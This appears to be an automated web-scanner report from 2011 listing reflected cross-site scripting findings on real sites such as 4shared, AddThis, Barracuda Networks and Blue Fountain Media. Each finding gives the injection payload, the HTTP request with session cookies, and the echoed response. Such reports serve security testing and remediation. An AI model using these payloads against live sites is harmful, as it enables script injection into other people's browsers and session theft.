<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/servlet/ProgressStatus1bde4"-alert(1)-"3d9d65c0126"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32833"-alert(1)-"cfb3f47bbd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/signUpBox.jsp32833"-alert(1)-"cfb3f47bbd9"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of the df request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddab9"><script>alert(1)</script>9c513f7cbd was submitted in the df parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c443"-alert(1)-"b44cf3dbe12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /signup.jsp4c443"-alert(1)-"b44cf3dbe12 HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/signup.jsp4c443"-alert(1)-"b44cf3dbe12"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57f3"-alert(1)-"9c05979d3ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms.jspe57f3"-alert(1)-"9c05979d3ce HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/terms.jspe57f3"-alert(1)-"9c05979d3ce"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77634"-alert(1)-"5c89a3db097 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /toolbar77634"-alert(1)-"5c89a3db097/ HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/toolbar77634"-alert(1)-"5c89a3db097/"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var win ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a660"-alert(1)-"4970c919f8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php2a660"-alert(1)-"4970c919f8f HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 26 Feb 2011 02:27:47 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=rlqct9gvdd6ap0sef9fgi11516; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1497 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php2a660"-alert(1)-"4970c919f8f"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6bb59<script>alert(1)</script>a82bc7f70b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php6bb59<script>alert(1)</script>a82bc7f70b0 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 26 Feb 2011 02:27:47 GMT Server: Apache X-Powered-By: PHP/5.2.16 Set-Cookie: PHPSESSID=0lqdr0jdrkdog37gs8hf6ue980; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1523 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php6bb59<script>alert(1)</script>a82bc7f70b0</strong> ...[SNIP]...
1.379. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 515d4"-alert(1)-"4d824db82c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/515d4"-alert(1)-"4d824db82c8 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 02:27:42 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 93762
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/515d4"-alert(1)-"4d824db82c8"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
1.380. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.barracudanetworks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23b85"><script>alert(1)</script>47dc06b9b56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?23b85"><script>alert(1)</script>47dc06b9b56=1 HTTP/1.1 Host: www.barracudanetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=91832325.1298729756.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; __utma=91832325.720058028.1298729756.1298729756.1298729756.1; __utmc=91832325; __utmb=91832325.7.10.1298729756; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/6.0 Set-Cookie: locale=+; expires=Sat, 26-Feb-2011 14:17:15 GMT Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/ Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Mon, 28-Mar-2011 14:25:35 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 14:25:34 GMT Connection: close
1.381. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.barracudanetworks.com
Path:
/ns/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77966"><script>alert(1)</script>07aa399813d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/?77966"><script>alert(1)</script>07aa399813d=1 HTTP/1.1 Host: www.barracudanetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=91832325.1298729756.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; __utma=91832325.720058028.1298729756.1298729756.1298729756.1; __utmc=91832325; __utmb=91832325.7.10.1298729756; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D;
Response
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/6.0 Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Mon, 28-Mar-2011 14:25:25 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 14:25:24 GMT Connection: close
1.382. http://www.barracudanetworks.com/ns/privacy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.barracudanetworks.com
Path:
/ns/privacy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79583"><script>alert(1)</script>2d1c850e69a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/privacy/?79583"><script>alert(1)</script>2d1c850e69a=1 HTTP/1.1 Host: www.barracudanetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=91832325.1298729756.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; __utma=91832325.720058028.1298729756.1298729756.1298729756.1; __utmc=91832325; __utmb=91832325.7.10.1298729756; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D;
Response
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/6.0 Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Mon, 28-Mar-2011 14:25:01 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 14:25:01 GMT Connection: close
1.383. http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40caf"><script>alert(1)</script>570f923664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/web-application-controller-overview.php?40caf"><script>alert(1)</script>570f923664=1 HTTP/1.1 Host: www.barracudanetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/6.0 Set-Cookie: locale=+; expires=Sat, 26-Feb-2011 02:19:53 GMT Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/ Set-Cookie: barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Mon, 28-Mar-2011 02:28:13 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 02:28:12 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efa53'-alert(1)-'fbcad5d3485 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74cde'-alert(1)-'f8dda444ccc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0e81'-alert(1)-'7ae183ccf99 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a9bf'-alert(1)-'356075889d3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.388. http://www.bluefountainmedia.com/blog [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bluefountainmedia.com
Path:
/blog
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 946e6"><script>alert(1)</script>34e444257db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 946e6\"><script>alert(1)</script>34e444257db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog?946e6"><script>alert(1)</script>34e444257db=1 HTTP/1.1 Host: www.bluefountainmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=209757126.1298575694.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=k8bib9hlac8ou41qlaquip2cu0; __utma=209757126.27733805.1298575694.1298575694.1298575694.1; __utmc=209757126; __utmb=209757126.7.9.1298575709781;
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 24 Feb 2011 20:07:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.16 X-Pingback: http://www.bluefountainmedia.com/blog/xmlrpc.php Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98113
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <m ...[SNIP]... <a class="prev" href="http://www.bluefountainmedia.com/blog/?946e6\"><script>alert(1)</script>34e444257db=1"> ...[SNIP]...
1.389. http://www.bluefountainmedia.com/blog/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bluefountainmedia.com
Path:
/blog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8537e"><script>alert(1)</script>f7d37bfe391 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8537e\"><script>alert(1)</script>f7d37bfe391 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/?8537e"><script>alert(1)</script>f7d37bfe391=1 HTTP/1.1 Host: www.bluefountainmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=209757126.1298575694.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=k8bib9hlac8ou41qlaquip2cu0; __utma=209757126.27733805.1298575694.1298575694.1298575694.1; __utmc=209757126; __utmb=209757126.7.9.1298575709781;
Response
HTTP/1.1 200 OK Date: Thu, 24 Feb 2011 19:47:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.16 X-Pingback: http://www.bluefountainmedia.com/blog/xmlrpc.php Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98113
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <m ...[SNIP]... <a class="prev" href="http://www.bluefountainmedia.com/blog/?8537e\"><script>alert(1)</script>f7d37bfe391=1"> ...[SNIP]...
1.390. http://www.bluefountainmedia.com/business [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bluefountainmedia.com
Path:
/business
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8048e"><script>alert(1)</script>308759de2c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8048e\"><script>alert(1)</script>308759de2c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /business?8048e"><script>alert(1)</script>308759de2c9=1 HTTP/1.1 Host: www.bluefountainmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=209757126.1298575694.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=k8bib9hlac8ou41qlaquip2cu0; __utma=209757126.27733805.1298575694.1298575694.1298575694.1; __utmc=209757126; __utmb=209757126.7.9.1298575709781;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <m ...[SNIP]... <a class="prev" href="http://www.bluefountainmedia.com/business/?8048e\"><script>alert(1)</script>308759de2c9=1"> ...[SNIP]...
1.391. http://www.bluefountainmedia.com/business/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bluefountainmedia.com
Path:
/business/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e00b"><script>alert(1)</script>6cd56da3a88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e00b\"><script>alert(1)</script>6cd56da3a88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /business/?2e00b"><script>alert(1)</script>6cd56da3a88=1 HTTP/1.1 Host: www.bluefountainmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=209757126.1298575694.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=k8bib9hlac8ou41qlaquip2cu0; __utma=209757126.27733805.1298575694.1298575694.1298575694.1; __utmc=209757126; __utmb=209757126.7.9.1298575709781;
The value of the culture request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5aeb'%3balert(1)//945a0b1fe9a was submitted in the culture parameter. This input was echoed as b5aeb';alert(1)//945a0b1fe9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the role request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbaf0'%3balert(1)//3aa185a0bce was submitted in the role parameter. This input was echoed as dbaf0';alert(1)//3aa185a0bce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /application.html?role=Writerdbaf0'%3balert(1)//3aa185a0bce&utm_source=DemandMedia&utm_medium=site&utm_campaign=writer HTTP/1.1 Host: www.demandstudios.com Connection: keep-alive Referer: http://www.demandmedia.com/studios/writers/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<head> <title>Demand Media Studios Application for Writers, Copy Editors, Filmmakers & Other Freelance Jobs | Demand Media Studios</title> <meta cha ...[SNIP]... new Application({ tooltipTarget: $('#application .wrapper'), form: $('#writerApp') });
// console.log(application); var desiredrole = 'Writerdbaf0';alert(1)//3aa185a0bce';
// attach role qualification switches
var desiredroleclean = '#' + desiredrole.toLowerCase() + 'Role'; $(desiredroleclean).attr('checked', 'checked');
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36e73"><a>9552f5671b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /bus36e73"><a>9552f5671b8/terms.html HTTP/1.1 Host: www.dyn-web.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
